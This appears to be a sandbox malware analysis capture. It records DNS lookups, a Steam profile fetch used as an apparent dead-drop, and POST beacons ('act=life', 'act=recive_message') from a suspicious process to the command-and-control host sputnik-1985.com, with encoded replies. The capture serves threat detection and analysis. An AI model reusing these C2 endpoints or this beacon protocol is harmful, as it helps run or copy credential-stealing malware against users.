Jan 7, 2025 15:45:54.925497055 CET	1.1.1.1	192.168.2.6	0x19d7	Name error (3)	wholersorie.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:54.937640905 CET	1.1.1.1	192.168.2.6	0x6fa	Name error (3)	framekgirus.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:54.947957039 CET	1.1.1.1	192.168.2.6	0xb1db	Name error (3)	tirepublicerj.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:54.964819908 CET	1.1.1.1	192.168.2.6	0x84b	Name error (3)	noisycuttej.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:54.978986025 CET	1.1.1.1	192.168.2.6	0x3fc	Name error (3)	rabidcowse.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:55.067394018 CET	1.1.1.1	192.168.2.6	0xd0e2	Name error (3)	cloudewahsj.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:55.079068899 CET	1.1.1.1	192.168.2.6	0xfbdd	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:56.369052887 CET	1.1.1.1	192.168.2.6	0xa865	No error (0)	sputnik-1985.com		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:56.369052887 CET	1.1.1.1	192.168.2.6	0xa865	No error (0)	sputnik-1985.com		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:56.369052887 CET	1.1.1.1	192.168.2.6	0xa865	No error (0)	sputnik-1985.com		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:56.369052887 CET	1.1.1.1	192.168.2.6	0xa865	No error (0)	sputnik-1985.com		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:56.369052887 CET	1.1.1.1	192.168.2.6	0xa865	No error (0)	sputnik-1985.com		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:56.369052887 CET	1.1.1.1	192.168.2.6	0xa865	No error (0)	sputnik-1985.com		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:56.369052887 CET	1.1.1.1	192.168.2.6	0xa865	No error (0)	sputnik-1985.com		104.21.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

sputnik-1985.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	50736	104.102.49.254	443	6596	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Timestamp	Bytes transferred	Direction	Data
2025-01-07 14:45:55 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2025-01-07 14:45:56 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 07 Jan 2025 14:45:56 GMT Content-Length: 35126 Connection: close Set-Cookie: sessionid=a28b06deabeb10a47d755616; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-07 14:45:56 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-07 14:45:56 UTC	16384	IN	Data Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
2025-01-07 14:45:56 UTC	3768	IN	Data Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
2025-01-07 14:45:56 UTC	495	IN	Data Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 Data Ascii: criber Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	50737	104.21.64.1	443	6596	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Timestamp	Bytes transferred	Direction	Data
2025-01-07 14:45:56 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sputnik-1985.com
2025-01-07 14:45:56 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-07 14:45:57 UTC	1119	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 14:45:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ih6100gfefhbh1uc5lba182bj0; expires=Sat, 03 May 2025 08:32:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZISyoiXRe40EUviUlpgRIK5Vp2Crfflo4lMQ6ZxYVPZPqTsrj6oZHPRHOnwFzqPEwwHdcjvpt7JAHUubKODiJHfEXuS%2BNZMIXIdV%2B5dHVv6Mn5UJ9Lg9pX7gwtZDVBB8oy5I"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe4bc06bbd64414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2432&min_rtt=2382&rtt_var=929&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=907&delivery_rate=1225860&cwnd=180&unsent_bytes=0&cid=b20f39fd5d6603db&ts=343&x=0"
2025-01-07 14:45:57 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-07 14:45:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	50738	104.21.64.1	443	6596	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Timestamp	Bytes transferred	Direction	Data
2025-01-07 14:45:57 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 81 Host: sputnik-1985.com
2025-01-07 14:45:57 UTC	81	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 4d 72 53 61 6c 74 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--@MrSalt&j=b9abc76ce53b6fc3a03566f8f764f5ea
2025-01-07 14:45:58 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 14:45:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g1tg1gk9609abbf1di81of3o5l; expires=Sat, 03 May 2025 08:32:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6LAmIeCSW55UzbRvEklx1K%2BNKg8QljistdC9GuOY3%2BAXOuL493a9fbDx2lXQpfbqMjubMYou5%2F42zNlcNm%2FGSR6ODfluLenaItNaqNQb7yxLo2PNHXzkBF%2Fzk%2Fln8brHPUA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe4bc0bdd1142e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1753&min_rtt=1739&rtt_var=662&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=981&delivery_rate=1679125&cwnd=240&unsent_bytes=0&cid=fb35a493f2329bcb&ts=500&x=0"
2025-01-07 14:45:58 UTC	242	IN	Data Raw: 32 64 39 38 0d 0a 78 6b 56 56 54 62 4c 41 56 76 79 57 41 65 31 56 75 76 53 2b 73 51 57 67 2b 6c 4e 46 62 72 55 79 72 2b 65 2f 6a 77 53 76 50 34 53 39 5a 79 4e 76 69 50 52 36 33 75 56 6b 7a 32 2f 63 6c 64 4c 43 59 49 7a 59 4d 69 46 4d 6a 31 54 4f 69 38 7a 71 4b 49 31 4a 36 65 52 2f 4d 79 7a 65 73 7a 50 51 74 47 53 56 64 34 43 76 78 5a 4e 67 7a 74 68 70 5a 77 76 66 55 4d 36 4c 33 65 35 76 77 45 2f 6f 70 53 30 35 4b 74 71 6c 4e 5a 6a 33 62 59 41 77 33 35 48 66 32 32 76 4a 6c 7a 73 6f 54 4a 6b 51 79 70 32 64 74 53 62 69 57 76 43 6e 43 44 51 2b 32 65 49 72 30 4f 30 6a 69 44 75 59 7a 70 7a 51 59 4d 4b 57 4e 53 45 46 33 56 72 48 67 39 7a 72 62 74 39 57 34 71 34 74 4e 79 6e 62 72 7a 79 4d 2b 6d 65 48 4f 39 6d 62 33 35 4d 70 Data Ascii: 2d98xkVVTbLAVvyWAe1VuvS+sQWg+lNFbrUyr+e/jwSvP4S9ZyNviPR63uVkz2/cldLCYIzYMiFMj1TOi8zqKI1J6eR/MyzeszPQtGSVd4CvxZNgzthpZwvfUM6L3e5vwE/opS05KtqlNZj3bYAw35Hf22vJlzsoTJkQyp2dtSbiWvCnCDQ+2eIr0O0jiDuYzpzQYMKWNSEF3VrHg9zrbt9W4q4tNynbrzyM+meHO9mb35Mp
2025-01-07 14:45:58 UTC	1369	IN	Data Raw: 67 70 38 70 5a 31 53 58 41 2f 2b 47 7a 50 78 7a 77 45 33 67 35 44 68 35 4e 70 43 6c 4f 4e 36 73 49 34 63 37 31 70 50 66 33 47 44 44 6d 43 4d 6f 44 4e 52 59 78 59 48 58 34 6d 6e 43 55 2b 79 6a 4c 7a 34 6f 33 36 55 38 6d 50 74 67 7a 33 6d 59 6b 63 53 54 50 34 4b 34 49 53 51 50 77 31 33 63 78 63 4b 6a 66 34 31 61 36 75 52 2f 64 79 6e 65 6f 7a 6d 65 35 6d 75 45 50 4e 32 45 31 39 70 71 7a 35 67 38 4c 51 50 55 55 4d 71 50 31 2b 4a 73 79 56 44 72 6f 69 63 33 62 35 37 69 4d 34 61 30 4f 38 38 55 33 59 62 62 33 33 47 41 6f 6e 45 34 51 73 34 51 79 6f 6d 64 74 53 62 46 57 4f 57 6e 4c 44 67 73 32 4b 6b 6d 6e 75 5a 6c 67 6a 4c 4b 6b 4e 6e 64 62 63 47 4b 4f 79 6b 4b 31 46 6e 47 6a 4e 6a 71 59 6f 30 54 70 71 4d 2f 64 33 65 51 67 7a 6d 56 2b 47 6d 59 4e 35 69 4a 6b 73 6f Data Ascii: gp8pZ1SXA/+GzPxzwE3g5Dh5NpClON6sI4c71pPf3GDDmCMoDNRYxYHX4mnCU+yjLz4o36U8mPtgz3mYkcSTP4K4ISQPw13cxcKjf41a6uR/dyneozme5muEPN2E19pqz5g8LQPUUMqP1+JsyVDroic3b57iM4a0O88U3Ybb33GAonE4Qs4QyomdtSbFWOWnLDgs2KkmnuZlgjLKkNndbcGKOykK1FnGjNjqYo0TpqM/d3eQgzmV+GmYN5iJkso
2025-01-07 14:45:58 UTC	1369	IN	Data Raw: 53 38 4a 31 6c 72 48 78 5a 4f 74 59 64 55 64 76 75 51 57 49 43 53 53 6c 7a 65 51 2b 6d 53 5a 64 38 66 59 78 5a 4e 67 7a 74 68 70 5a 77 48 66 56 63 69 4b 33 4f 64 6f 79 46 66 71 72 43 6b 30 50 64 2b 6d 4e 4a 4c 38 61 59 49 35 33 4a 37 56 32 47 7a 45 6d 44 41 74 54 4a 6b 51 79 70 32 64 74 53 62 35 57 75 71 70 4b 48 55 61 30 36 77 36 6d 65 49 6a 6b 48 6e 42 31 74 76 66 4a 35 72 59 50 53 34 4d 33 46 72 4a 68 64 72 67 59 38 35 61 35 61 6b 67 50 53 48 58 70 6a 69 58 2b 57 57 50 4d 4e 79 54 7a 74 5a 75 7a 70 52 78 61 55 7a 51 53 49 33 64 6e 63 4a 68 32 31 37 4a 70 7a 59 2b 62 38 2f 73 4c 64 37 7a 62 38 39 76 6d 4a 48 5a 32 32 7a 45 6b 44 45 31 43 64 6c 62 7a 49 2f 62 37 47 76 42 57 2b 61 6c 4a 7a 45 6a 30 4b 55 7a 6a 4f 5a 6d 69 53 58 53 31 70 4b 54 59 4e 72 59 Data Ascii: S8J1lrHxZOtYdUdvuQWICSSlzeQ+mSZd8fYxZNgzthpZwHfVciK3OdoyFfqrCk0Pd+mNJL8aYI53J7V2GzEmDAtTJkQyp2dtSb5WuqpKHUa06w6meIjkHnB1tvfJ5rYPS4M3FrJhdrgY85a5akgPSHXpjiX+WWPMNyTztZuzpRxaUzQSI3dncJh217JpzY+b8/sLd7zb89vmJHZ22zEkDE1CdlbzI/b7GvBW+alJzEj0KUzjOZmiSXS1pKTYNrY
2025-01-07 14:45:58 UTC	1369	IN	Data Raw: 73 51 6c 63 58 65 34 6d 2f 43 56 65 36 72 4b 44 4d 68 31 71 51 35 6d 2f 74 70 6e 54 2f 57 6d 39 66 63 62 4e 43 59 50 43 4d 41 30 31 6a 47 6a 35 32 6a 4a 73 70 46 70 76 78 6e 41 69 4c 66 6f 6a 65 49 74 48 7a 42 4c 70 69 52 30 4a 4d 2f 67 70 51 2f 4a 77 50 62 58 4d 61 4e 33 4f 46 6f 79 6c 6a 76 72 43 38 6c 4c 74 53 71 4e 5a 44 37 59 6f 73 79 33 5a 4c 62 31 32 48 4e 32 48 39 6e 43 38 38 51 6c 63 58 79 79 6c 4f 50 66 4e 7a 6b 4f 48 6b 32 6b 4b 55 34 33 71 77 6a 67 7a 54 55 6e 74 50 56 62 73 36 53 4f 43 77 41 33 46 54 42 6a 4e 6a 72 5a 38 68 59 35 36 41 72 50 53 6e 54 6f 54 75 52 2b 32 76 50 65 5a 69 52 78 4a 4d 2f 67 72 30 6d 4c 41 4c 52 45 4e 4c 4c 78 4b 31 68 77 52 32 2b 35 43 73 2b 4b 64 61 6e 4f 4a 2f 79 61 34 6f 2f 33 4a 66 61 31 57 54 4e 6e 44 51 6d 41 Data Ascii: sQlcXe4m/CVe6rKDMh1qQ5m/tpnT/Wm9fcbNCYPCMA01jGj52jJspFpvxnAiLfojeItHzBLpiR0JM/gpQ/JwPbXMaN3OFoyljvrC8lLtSqNZD7Yosy3ZLb12HN2H9nC88QlcXyylOPfNzkOHk2kKU43qwjgzTUntPVbs6SOCwA3FTBjNjrZ8hY56ArPSnToTuR+2vPeZiRxJM/gr0mLALRENLLxK1hwR2+5Cs+KdanOJ/ya4o/3Jfa1WTNnDQmA
2025-01-07 14:45:58 UTC	1369	IN	Data Raw: 4b 33 76 39 6e 77 46 62 30 6f 79 67 7a 4b 4e 79 6b 4f 35 6a 31 5a 6f 55 37 33 35 50 58 33 47 75 43 31 6e 45 67 46 4a 63 49 6a 61 76 57 2f 6e 48 4f 55 2b 32 79 50 48 63 77 6e 72 74 30 6d 66 67 6a 31 33 66 62 6e 64 66 58 5a 38 36 59 4e 53 6f 4d 78 56 2f 4b 67 74 54 6d 64 4d 64 61 34 61 38 76 50 43 44 57 73 44 69 51 35 6d 61 64 4a 5a 6a 59 6e 4e 52 2f 67 73 42 78 45 51 76 48 51 4d 37 48 37 50 74 6c 32 31 62 72 71 47 63 6f 59 63 6e 69 4d 35 4b 30 4f 38 38 78 31 35 2f 66 33 47 62 4c 6c 44 77 69 42 64 4a 52 79 34 48 58 35 32 62 4c 57 2b 65 68 4c 54 51 75 32 71 73 7a 6c 76 4e 67 6e 58 65 57 31 74 76 4c 4a 35 72 59 47 43 41 65 32 55 43 4e 6d 70 50 30 4a 73 70 52 70 76 78 6e 4d 79 58 66 70 6a 4f 53 38 6d 61 4a 4f 74 6d 5a 33 64 4e 6f 78 70 4d 34 49 51 33 61 56 63 Data Ascii: K3v9nwFb0oygzKNykO5j1ZoU735PX3GuC1nEgFJcIjavW/nHOU+2yPHcwnrt0mfgj13fbndfXZ86YNSoMxV/KgtTmdMda4a8vPCDWsDiQ5madJZjYnNR/gsBxEQvHQM7H7Ptl21brqGcoYcniM5K0O88x15/f3GbLlDwiBdJRy4HX52bLW+ehLTQu2qszlvNgnXeW1tvLJ5rYGCAe2UCNmpP0JspRpvxnMyXfpjOS8maJOtmZ3dNoxpM4IQ3aVc
2025-01-07 14:45:58 UTC	1369	IN	Data Raw: 59 63 45 64 76 75 51 6e 50 53 72 61 72 7a 65 52 39 33 47 4f 4d 63 71 57 30 64 6c 31 79 4a 4d 30 4b 67 48 61 55 38 75 44 31 75 46 30 78 46 33 6c 72 32 64 35 62 39 65 36 64 4d 61 30 51 4a 67 68 30 70 48 51 78 57 7a 44 6d 79 63 71 48 4a 63 65 6a 5a 54 61 2f 43 61 56 53 2f 61 7a 49 43 68 68 79 65 49 7a 6b 72 51 37 7a 7a 48 52 6b 4e 76 56 61 64 43 64 4e 79 67 44 33 6c 6e 4a 6a 64 37 74 59 73 6c 61 34 36 63 72 50 43 6a 54 72 54 43 58 2b 6d 71 41 64 35 62 57 32 38 73 6e 6d 74 67 51 50 41 2f 62 58 59 32 61 6b 2f 51 6d 79 6c 47 6d 2f 47 63 37 49 64 57 69 50 70 6a 77 5a 6f 6b 39 33 5a 62 58 30 47 6a 47 6e 6a 55 6f 44 4e 78 5a 7a 49 50 59 35 32 33 4c 55 4f 57 69 49 58 64 68 6b 4b 55 73 33 71 77 6a 72 79 7a 56 6d 74 75 54 65 49 79 42 63 53 41 41 6c 77 69 4e 6a 74 48 Data Ascii: YcEdvuQnPSrarzeR93GOMcqW0dl1yJM0KgHaU8uD1uF0xF3lr2d5b9e6dMa0QJgh0pHQxWzDmycqHJcejZTa/CaVS/azIChhyeIzkrQ7zzHRkNvVadCdNygD3lnJjd7tYsla46crPCjTrTCX+mqAd5bW28snmtgQPA/bXY2ak/QmylGm/Gc7IdWiPpjwZok93ZbX0GjGnjUoDNxZzIPY523LUOWiIXdhkKUs3qwjryzVmtuTeIyBcSAAlwiNjtH
2025-01-07 14:45:58 UTC	1369	IN	Data Raw: 62 36 64 5a 7a 34 6f 79 37 4d 69 6b 2b 52 6b 7a 77 69 57 31 73 53 54 50 34 4b 74 4d 69 6b 43 30 45 62 63 79 50 72 37 62 4d 70 4e 34 62 4d 6f 64 32 47 51 70 48 54 47 70 79 33 50 4d 38 6e 57 68 49 4d 31 6d 63 31 69 63 46 79 46 54 34 4f 63 6e 66 73 6d 6c 51 2b 6f 35 44 56 33 64 35 44 6c 4e 34 7a 6d 5a 59 77 68 32 39 48 69 37 55 44 59 6c 54 63 77 48 65 6c 75 79 70 2f 51 36 33 48 63 45 66 4f 6e 4b 54 6b 6f 78 75 4a 36 33 76 73 6a 31 77 36 59 33 70 7a 73 4b 59 4b 41 63 58 39 4d 34 6c 50 44 69 39 72 37 64 34 42 36 2f 4b 6b 68 49 44 36 51 37 48 53 59 74 44 76 66 65 5a 69 53 7a 5a 4d 2f 6b 73 70 71 63 6c 2b 41 41 4a 2b 61 6b 2f 51 6d 32 78 32 2b 39 6d 6c 33 50 5a 44 36 64 4e 6e 33 63 5a 30 78 32 34 44 66 6c 46 6e 38 74 6a 59 68 43 64 42 41 6a 36 76 57 2b 57 47 4e Data Ascii: b6dZz4oy7Mik+RkzwiW1sSTP4KtMikC0EbcyPr7bMpN4bMod2GQpHTGpy3PM8nWhIM1mc1icFyFT4OcnfsmlQ+o5DV3d5DlN4zmZYwh29Hi7UDYlTcwHeluyp/Q63HcEfOnKTkoxuJ63vsj1w6Y3pzsKYKAcX9M4lPDi9r7d4B6/KkhID6Q7HSYtDvfeZiSzZM/kspqcl+AAJ+ak/Qm2x2+9ml3PZD6dNn3cZ0x24DflFn8tjYhCdBAj6vW+WGN
2025-01-07 14:45:58 UTC	1369	IN	Data Raw: 45 6e 4f 4e 2f 69 65 74 37 79 49 39 64 6c 6c 74 62 59 77 69 65 61 79 47 4e 38 57 59 51 48 6e 64 66 43 6f 33 2b 4e 53 36 62 38 64 58 6c 76 77 75 4a 73 33 72 4e 67 6e 53 58 65 6c 63 72 51 49 50 79 6d 46 69 6b 4c 31 6b 62 64 6b 74 4b 69 53 50 74 38 32 4a 6f 79 4e 43 48 65 70 53 4b 50 74 43 33 50 4f 4a 6a 4f 35 5a 4d 76 67 71 64 2f 5a 78 53 58 43 49 32 77 33 75 4e 6f 79 6b 76 33 36 51 41 35 4b 4e 47 30 4a 49 6e 37 4c 4b 45 42 2b 64 61 53 6b 32 47 43 77 47 4e 70 54 4e 4e 42 6a 64 32 4e 76 7a 32 59 44 72 48 30 64 53 68 68 79 65 49 69 33 71 77 78 77 58 66 4b 31 6f 53 54 49 4d 47 4b 49 79 45 50 77 56 4f 4b 75 2b 50 4b 61 4d 70 63 38 4c 51 71 4f 77 37 54 73 7a 36 67 79 6e 61 4d 4f 64 61 52 79 73 49 6e 6a 4e 67 2b 5a 31 54 75 45 49 58 46 34 71 4d 6d 31 52 32 2b 35 Data Ascii: EnON/iet7yI9dlltbYwieayGN8WYQHndfCo3+NS6b8dXlvwuJs3rNgnSXelcrQIPymFikL1kbdktKiSPt82JoyNCHepSKPtC3POJjO5ZMvgqd/ZxSXCI2w3uNoykv36QA5KNG0JIn7LKEB+daSk2GCwGNpTNNBjd2Nvz2YDrH0dShhyeIi3qwxwXfK1oSTIMGKIyEPwVOKu+PKaMpc8LQqOw7Tsz6gynaMOdaRysInjNg+Z1TuEIXF4qMm1R2+5
2025-01-07 14:45:58 UTC	1369	IN	Data Raw: 68 72 7a 43 49 34 57 43 66 4d 4f 61 6f 38 63 46 67 30 70 74 7a 43 77 76 61 58 50 4f 37 36 76 78 68 33 52 2f 41 70 7a 45 30 62 35 37 69 4c 4e 36 73 49 36 49 6c 33 34 62 66 6b 55 76 46 6c 54 31 6e 45 35 6c 4a 6a 5a 4f 64 74 54 57 44 48 66 54 6b 66 33 64 6f 30 37 41 6d 6d 50 64 31 6a 48 44 6d 71 50 48 42 59 4e 4b 62 63 78 59 42 30 30 62 59 68 73 33 71 57 50 4e 77 39 4b 4d 33 4e 47 33 31 6d 48 61 76 34 6d 43 50 4f 64 2f 57 6b 70 4e 2f 67 73 42 78 43 68 37 51 51 4d 37 48 2b 4e 63 6b 2f 45 76 6c 70 43 6b 77 62 35 37 69 4f 4e 36 73 49 34 49 6c 33 34 62 66 6e 32 44 59 6e 33 45 34 51 73 34 51 32 38 57 46 76 69 69 4e 54 36 62 38 5a 33 41 68 33 61 4d 33 6b 50 64 78 6e 54 48 62 67 4e 2b 55 57 66 79 33 4f 69 59 63 32 6b 48 41 67 63 76 54 57 4f 70 62 34 36 4d 5a 43 52 Data Ascii: 